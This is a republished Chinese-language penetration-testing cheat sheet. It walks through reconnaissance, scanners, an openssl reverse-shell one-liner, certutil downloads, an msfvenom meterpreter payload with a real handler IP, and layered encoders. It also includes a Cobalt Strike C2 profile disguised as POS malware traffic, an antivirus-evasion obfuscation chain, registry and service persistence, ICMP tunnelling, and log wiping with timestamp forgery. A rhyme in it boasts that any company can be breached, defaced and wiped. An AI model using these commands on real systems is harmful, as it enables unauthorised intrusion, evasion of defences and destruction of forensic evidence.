前言
首先我們拿到一個站不能心急,凡事三思而行 跑得太快是會滑倒的當我們獲得目標的時候不要急著用掃描器,這樣會不僅會影響服務器的速度還會在對方的服務器日志生成大量的記錄,什么站能掃什么站不能掃,心里一定要有點b數(shù),不然可能等待的就是不一樣的結果了。如果手工測試無果后再用代理手法掃描網(wǎng)站,必要的時候設置二級代理。當然?。。。?/span>什么站能掃什么站不能掃,心里一定要有點數(shù)!小提示:在使用proxychains的時候,程序或者終端選項盡量不要設置任何協(xié)議的代理,否則可能會打亂這個代理回路出現(xiàn)網(wǎng)絡錯誤。
淺藍的滲透測試導圖以及小工具
一個導圖,可以做一個大致的方向參考,跟著方向逐一測試,期間也可以鞏固基礎。https://github.com/iSafeBlue/Mind-Map/releases
# 拉取鏡像
docker pull leishianquan/awvs-nessus:v1
# 啟動
docker run -it -d -p 13443:3443 -p 8834:8834 leishianquan/awvs-nessus:v1
# 查看容器
docker ps –a
# 啟動容器
docker start container-id
# 進入容器
docker exec –it container-id /bin/bash
# 進入容器后,啟動nessus
start
# 訪問掃描器地址和賬號密碼
Nessus:
https://127.0.0.1:8834/#/
account:leishi/leishianquan
Awvs13:
https://127.0.0.1:13443/
account:ad[email protected]/Admin123
ZERO
首先進行信息收集你獲得的信息越多對自己后面的滲透就越有幫助,whois,旁站子域,服務器操作系統(tǒng)版本,web中間件以及waf與cdn,通過google與github看看是否存在已知的漏洞這樣有助于快速的獲得權限,端口掃描并判斷服務漏洞加以利用,目錄的fuzz,弱口令的fuzz,google hack 進一步探測網(wǎng)站的信息后臺以及敏感信息,撒旦天眼也是不錯的信息工具。一.時刻關注返回的數(shù)據(jù)包
漏洞有很多種類型都需要滲透方認證仔細的對每個數(shù)據(jù)包已經(jīng)url進行驗證,要相信所有的努力都是為成功而付出的。如XSS,XSRF,sql注入,代碼執(zhí)行,命令執(zhí)行,越權訪問,目錄讀取,任意文件讀取,下載,文件包含,遠程命令執(zhí)行,弱口令,上傳,編輯器漏洞,暴力破解等-
驗證碼與郵箱以及token的返回泄露,以及后臺為校驗從而可刪除的參數(shù)。 截獲的敏感數(shù)據(jù)參數(shù),學會在多個數(shù)據(jù)包反復嘗試。 從某個成功請求中捕獲數(shù)據(jù)包觀察cookie或者token是否存在規(guī)律或加密。 通過修改返回的狀態(tài)值,觸發(fā)js進行邏輯漏洞的滲透。 token的key參數(shù)解密構建獲取真實user密鑰,可拼接、規(guī)律、時間戳……
進谷歌 找注入
沒注入 就旁注
沒旁注 用0day
沒0day 猜目錄
沒目錄 就嗅探
爆賬戶 找后臺
傳小馬 放大馬
拿權限 掛頁面
放暗鏈 清數(shù)據(jù)
滲透企業(yè)實戰(zhàn)版
搞企業(yè) 先掃描
掃描器 商業(yè)好
默密碼 都知道
社工庫 找一找
郵箱號 先列好
九頭蛇 跑一跑
搞不定 放大招
找插件 挖一挖
發(fā)郵件 憑偽造
沒郵箱 搞網(wǎng)站
二級域 皆可爆
老漏洞 沒修好
新漏洞 刷一票
干研發(fā) Git 找
源代碼 全都要
C D N 可以跳
防火墻 可以撬
堡壘機 可以秒
云防護 可以秒
是企業(yè) 沒有哪家搞不了!
二.FUZZ的藝術https://www.freebuf.com/vuls/221129.html三.WEBBYPASS
linux反彈 shell:
上生成 ssl 證書的公鑰/私鑰對:
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
監(jiān)聽反彈 shell:
openssl s_server -quiet -key key.pem -cert cert.pem -port 80
shell:
mkfifo /tmp/s; /bin/bash -i < /tmp/s 2>&1 | openssl s_client -quiet -connect :1024 > /tmp/s; rm /tmp/s
VPS 上已獲取加密的 getshell 了。
winodws桌面:TeamViewerQS單文件windows下載文件;certutil -urlcache -split -fhttps://raw.githubusercontent.com/backlion/demo/master/CVE-2017-11882-v1.pytest.py腳本反彈內(nèi)網(wǎng):reGeorg(https://github.com/sensepost/reGeorg)1.將 tunnel腳本(aspx | ashx | jsp | php)上傳到Web服務器,訪問顯示“Georg says, ‘All seems fine’“,表示腳本運行正常。2.在攻擊者機器上,啟動reGeorgSocksProxy.py,監(jiān)聽9999端口,看到 Checking if Georg is ready,確認正常運行,這個時候就可以吧目標機作為跳板了。waf:中國蟻劍客戶端,冰蝎與內(nèi)存馬,反復嘗試使用編碼字節(jié)繞過四.提權與權限維持
首先通過檢查目標服務器的進程與可利用服務以及漏洞ssl加密payload
###生成證書并寫入文件
openssl req -new -newkey rsa:4096 -days 365 -nodes -x509 -keyout rsaprivate.key -out servercertificate.crt
cat rsaprivate.key servercertificate.crt >my.pem
###生成payload
msfvenom -p windows/meterpreter/reverse_winhttps LHOST=39.97.167.211 LPORT=6667 --platform windows -a x86 HandLerSSLCert= ./my.pem StagerVerifySSLCert=true -s 42 --smallest -e x86/shikata_ga_nai -i 9 -f raw| msfvenom --platform windows -a x86 -e x86/countdown -i 8 -f raw | msfvenom --platform windows -a x86 -e x86/call4_dword_xor -i 6 -b "x00x0ax0d" -f raw > /home/xskali/kali/Shecodject/output/shellcode.raw
###監(jiān)聽
msfconsole -q -x 'use exploit/multi/handler;set ExitOnSession false;set PAYLOAD windows/meterpreter/reverse_winhttps;set LHOST 192.168.129.128; set LPORT 4445; set HandlerSslCert /home/xskali/kali/Shecodject/output/my.pem;set StagerVerifySSLCert true; set SessionCommunicationTimeout 600 ;set autorunscript post/windows/manage/migrate; run -j -Z'
老牌工具Cobaltstrike+Profiles
上云和隱藏流量參考free教程(https://www.freebuf.com/articles/network/262445.html)1.利用keytool生成自己的免費證書(可在kali上生成)
keytool -genkey -alias tryblog -keyalg RSA -validity 36500 -keystore tryblog.store
2.C2.profile文件編輯
set sample_name "tryblog POS Malware";
set sleeptime "5000"; # use a ~30s delay between callbacks
set jitter "10"; # throw in a 10% jitter
set useragent "Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0";
#設置證書,注意以下內(nèi)容得和你之前生成的證書一樣
https-certificate {
set CN "TRY";
set O "TRY";
set C "TRY";
set L "TRY";
set OU "TRY";
set ST "TRY";
set validity "365";
}
#設置,修改成你的證書名稱和證書密碼
code-signer{
set keystore "tryblog.store";
set password "tryblog";
set alias "tryblog";
}
#指定DNS beacon不用的時候指定到IP地址
set dns_idle "8.8.4.4";
#每個單獨DNS請求前強制睡眠時間
set dns_sleep "0";
#通過DNS上載數(shù)據(jù)時主機名的最大長度[0-255]
set maxdns "235";
http-post {
set uri "/windebug/updcheck.php /aircanada/dark.php /aero2/fly.php /windowsxp/updcheck.php /hello/flash.php";
client {
header "Accept" "text/plain";
header "Accept-Language" "en-us";
header "Accept-Encoding" "text/plain";
header "Content-Type" "application/x-www-form-urltrytryd";
id {
netbios;
parameter "id";
}
output {
base64;
prepend "&op=1&id=vxeykS&ui=Josh @ PC&wv=11&gr=backoff&bv=1.55&data=";
print;
}
}
server {
output {
print;
}
}
}
http-get {
set uri "/updates";
client {
metadata {
netbiosu;
prepend "user=";
header "Cookie";
}
}
server {
header "Content-Type" "text/plain";
output {
base64;
print;
}
}
}
3.驗證c2lint,啟動服務端,載入漢化運行
C2.profile
ip:prot ./C2.profile
java -Dfile.encoding=UTF-8 -javaagent:CobaltStrikeCN.jar -XX:ParallelGCThreads=4 -XX:+AggressiveHeap -XX:+UseParallelGC -jar cobaltstrike.jar
免殺遠控整理(來自Tide團隊)

windows下的免殺生成(順序從上到下依次混淆)
如果需要捆綁正常軟件運行使用shellter,如不能過免殺,再分步測試以下操作。cs文件編碼混淆用AVIATOR生成。測試可以再用python再當前目錄打開一個web服務器:
python3 -m http.server 8080
1.Lime-Crypter 注入線程2.DeepSeaOBFuscator 封裝3.CryptoObfuscator 混淆4.https 證書修改5.base64prionx 混淆6.themida 加殼7.https 證書修改8.viper(在線msf處理平臺可加特征和簽名很方便)*通用免殺法(簡單概括就是1.修改特征碼2.花指令免殺3.加殼免殺。)
Veil
Veil是一種免殺生成工具,用于生成繞過常見防病毒解決方案的metasploit有效負載。一些payload加料的技巧
1、通過ssl與加殼加密palyoad(免殺)2、通過dns或套cdn傳輸:https://mp.weixin.qq.com/s/fdGnJxDjh1Orb2V76EX8tQwindows
Exploit批量掃描:Windows-Exploit-Suggester漏洞模塊:https://github.com/SecWiki/windows-kernel-exploitsBITS免殺提權:https://github.com/ohpe/juicy-potatolinux
搜尋配置文件中的明文密碼、sudo濫用Exploit批量掃描:linux-exploit-suggester、linux-exploit-suggester-2漏洞模塊:https://github.com/SecWiki/linux-kernel-exploits五、日志清理(細心的安全工程師會更改位置并定時備份后滲透主要還是靠細心)
windows
遇見不能刪除的先停止相關服務:net stop “task scheduler”系統(tǒng)日志推薦使用工具:clearlog.exemsf清理:clearev ,run event_manager -c
防火墻日志路徑:%systemroot%system32logfiles
IIS日志路徑:%systemroot%system32logfles
windows系統(tǒng)日志:%systemroot%system32config
Scheduler服務日志:%systemroot%schedlgu.txt
日志在注冊表的鍵:HKEY_LOCAL_MACHINEsystemCurrentControlSetServicesEventlog
系統(tǒng)日志:%SystemRoot%System32WinevtLogsSystem.evtx
安全日志:%SystemRoot%System32WinevtLogsSecurity.evtx
應用程序日志:%SystemRoot%System32WinevtLogsApplication.evtx
linux(檢索根目錄以及上級目錄是否存在備份)
1.清空當前用戶歷史命令并刪除相關文件:
history -c
echo “”> /root/.bash_history
echo “”> /var/run/utmp
2.清除部分日志:echo “”> /var/log/secure;全刪除如不能刪除使用echo依次覆蓋:rm -f -r /var/log/*;
/var/log/boot.log:錄了系統(tǒng)在引導過程中發(fā)生的事件,就是Linux系統(tǒng)開機自檢過程顯示的信息
/var/log/lastlog :記錄最后一次用戶成功登陸的時間、登陸IP等信息
/var/log/messages :記錄Linux操作系統(tǒng)常見的系統(tǒng)和服務錯誤信息
/var/log/secure :Linux系統(tǒng)安全日志,記錄用戶和工作組變壞情況、用戶登陸認證情況
/var/log/btmp :記錄Linux登陸失敗的用戶、時間以及遠程IP地址
/var/log/syslog:只記錄警告信息,常常是系統(tǒng)出問題的信息,使用lastlog查看
/var/log/wtmp:該日志文件永久記錄每個用戶登錄、注銷及系統(tǒng)的啟動、停機的事件,使用last命令查看
/var/log/maillog 與郵件相關的日志信息
/var/log/cron 與定時任務相關的日志信息
/var/log/spooler 與UUCP和news設備相關的日志信息
/var/log/auth.log 系統(tǒng)授權信息,包括用戶登錄和使用的權限機制等 (debian)
/var/run/utmp:該日志文件記錄有關當前登錄的每個用戶的信息。如 who、w、users、finger等就需要訪問這個文件
3.更新test.txt的時間和test2.txt時間戳相同:touch -r test.txt test2.txt;設定時間戳:touch -t 201605171210.20 test.txtweb容器路徑
數(shù)據(jù)庫通過查詢配置文件定位日志(如mysql的配置文件文件my.inf,tomcat的配置文件tomcat-user.xml)winodws
apche:C:Program FilesApache Software FoundationApache2.2htdocs"
tomact:CProgram Filestomcatlog
nignx: CProgram Filesnginx-1.14.2logs
linux
tomcat:/usr/local/tomcat/logs/
apche:/usr/local/apache/logs/access_log
nignx:/var/log/httpd/error_log rm -f -r /var/log/*
七、后滲透與流量隱匿frsocks+protoplex+流量重定向實現(xiàn)端口復用
protoplex是一個協(xié)議復用的工具,比如以下命令可將本地9999端口的流量根據(jù)協(xié)議類型轉到本地的2333和80端口。用于繞過云主機的nsg安全規(guī)則。
./frsocks -sockstype fsocks -listen 2333 //創(chuàng)建本地監(jiān)聽
./protoplex --socks5 192.168.154.130:2333 --http 127.0.0.1:80 -b 192.168.154.130:9999 //端口分流,根據(jù)協(xié)議類型轉到本地的2333和80端口
重定向命令linux:
sudo iptables -t nat -A PREROUTING -p tcp -m tcp --dport 80 -j REDIRECT --to-ports 9999
windows:
netsh interface portproxy add v4tov4 listenport=80 listen address=192.168.154.129 connectport=9999 connectaddress=192.168.154.129
netsh interface portproxy show all //查看轉發(fā)規(guī)則
netsh interface portproxy reset //清除所有轉發(fā)規(guī)則
將 IP 流量封裝進 IMCP 的 ping 數(shù)據(jù)包進行傳輸
工具如下1、icmptunnel:https://github.com/jamesbarlow/icmptunnel2、ptunnel:http://www.cs.uit.no/~daniels/PingTunnel/3、icmpsh:https://github.com/inquisb/icmpsh4、Powershell-ICMP:https://github.com/api0cradle/Powershell-ICMP5、復雜的網(wǎng)絡環(huán)境可以使用EarchWorm(ew)實現(xiàn)多級代理訪問目標主機后滲透
ps:合理利用后滲透插件可以剩下很多時間,但是要注意痕跡清理。插件有謝公子和梼杌完整版比較常用,Cobaltstrike推薦插件:謝公子、梼杌、Z1-AggressorScripts、ladong
reg add HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun /v "Keyname" /t REG_SZ /d "C:UsersKingXL1.exe" /f
reg add HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun /v "test" /t REG_SZ /d "C:UsersKingXL1.exe" /f
sc create "server power" binpath= "C:WindowsSystem32config.exe"
//設置服務的描述字符串
sc description "server power" "description"
//設置這個服務為自動啟動
sc config "server power" start= auto
net start "server power" 啟動服務
八、 一個便捷的HACK瀏覽器(上火狐開發(fā)者版本也不錯)
這里個人做一個備份有需求的自行google,解釋一下英文的插件功能。


審核編輯 :李倩
聲明:本文內(nèi)容及配圖由入駐作者撰寫或者入駐合作網(wǎng)站授權轉載。文章觀點僅代表作者本人,不代表電子發(fā)燒友網(wǎng)立場。文章及其配圖僅供工程師學習之用,如有內(nèi)容侵權或者其他違規(guī)問題,請聯(lián)系本站處理。
舉報投訴
-
互聯(lián)網(wǎng)
+關注
關注
55文章
11249瀏覽量
106375 -
操作系統(tǒng)
+關注
關注
37文章
7144瀏覽量
125564 -
滲透
+關注
關注
0文章
21瀏覽量
6401
原文標題:干貨|個人滲透技巧匯總(避坑)筆記
文章出處:【微信號:菜鳥學信安,微信公眾號:菜鳥學信安】歡迎添加關注!文章轉載請注明出處。
發(fā)布評論請先 登錄
相關推薦
熱點推薦
基于STM32的USB程序開發(fā)筆記 匯總
忙了一下午終于有時間整理了,基于STM32的USB程序開發(fā)筆記匯總,需要的親們點擊鏈接閱讀哈!{:4_95:}基于STM32的USB程序開發(fā)筆記(一)https://bbs.elecfans.com
發(fā)表于 03-20 16:08
個人的學習資料匯總貼
本帖最后由 nyjingle 于 2020-8-11 10:09 編輯
【個人的學習資料匯總貼】MYMINIEYE:60天FPGA工程師入門就業(yè)項目實戰(zhàn)特訓營(視頻+開發(fā)板)http
發(fā)表于 08-07 11:16
STM32基礎知識入門避坑指南
一STM32入門踩坑筆記——(2)無敵的我、又回來了。。。。又是元氣滿滿的一天、又是踩坑崩潰的一天。昨晚上連夜把跑馬燈寄存器版本搞定了。這里需要聲明一下。哈哈、首先說我不是水軍或者托兒哈??!我
發(fā)表于 08-03 07:30
安裝VSCODE個人筆記
個人筆記安裝VSCODE。安裝CYGWIN以及里面的一套東西。安裝OPENOCD。安裝STM32CUBE以及一套庫的下載。幫助: CYGWIN
發(fā)表于 08-24 07:40
分享一些嵌入式系統(tǒng)編程中內(nèi)存操作相關的避坑指南
在嵌入式系統(tǒng)的編程中,內(nèi)存操作是我們常用到的,但往往也是易錯的地方,怎么避免呢,今天給大家分享一些相關的避坑指南。數(shù)據(jù)指針...
發(fā)表于 12-17 07:18
設計干貨:PCB板漏孔、漏槽在設計端如何避坑
,產(chǎn)品無法使用。請看下圖;如何避坑:PCB設計文件各層都有各層的作用,鉆孔、槽孔必須放置在鉆孔層,不能認為設計有就能制造。問題2:Altium設計的文件過孔0 D碼;問題描述:漏過孔開路,不導電。原因分析
發(fā)表于 09-23 10:52
PCB板漏孔、漏槽怎么辦?看工程師避坑“SOP”
。理論上此操作沒有多大問題,但是在制造過程中打孔只是用鉆孔層,因此容易忽略其他層存在槽孔,導致此槽孔漏做打孔,產(chǎn)品無法使用。請看下圖。如何避坑:PCB設計文件各層都有各層的作用,鉆孔、槽孔必須放置在
發(fā)表于 03-01 10:36
個人滲透技巧匯總
前言 首先我們拿到一個站不能心急,凡事三思而行 跑得太快是會滑倒的 當我們獲得目標的時候不要急著用掃描器,這樣會不僅會影響服務器的速度還會在對方的服務器日志生成大量的記錄,什么站能掃什么站不能掃,心里一定要有點b數(shù),不然可能等待的就是不一樣的結果了。 如果手工測試無果后再用代理手法掃描網(wǎng)站,必要的時候設置二級代理。 當然?。。。∈裁凑灸軖呤裁凑静荒軖?,心里一定要有點數(shù)! 小提示:在使用proxychains的時候,程序或者

【6月28日|直播】遇見KeysightCare——貴重儀器安全避坑指南
現(xiàn)場直播時間: 2023年6月28日 下午1415 ? 立即報名 01 直播簡介 什么?!價值百萬的儀器壞了?怎么就壞了呢?如果你有這樣的困惑,快來參加直播,聽聽專家詳細介紹如何“避坑”,保證高端

電源設計避坑(下)
。在上一期《電源設計避坑(上)》中,我們討論了電源設計中的電源功率、穩(wěn)定性、紋波控制以及尖峰和浪涌的問題,并結合實際案例提出了相應的應對措施。接下來,我們將繼續(xù)探索

2025年G口大帶寬服務器選購指南:避坑這3點,省下50%成本!
面對市場上琳瑯滿目的服務器產(chǎn)品,如何避免踩坑、實現(xiàn)成本與性能的平衡,成為企業(yè)和個人用戶關注的焦點。本文將從配置需求、避坑要點、成本控制三大維度,為您提供一份客觀、簡潔的2025年G口大
評論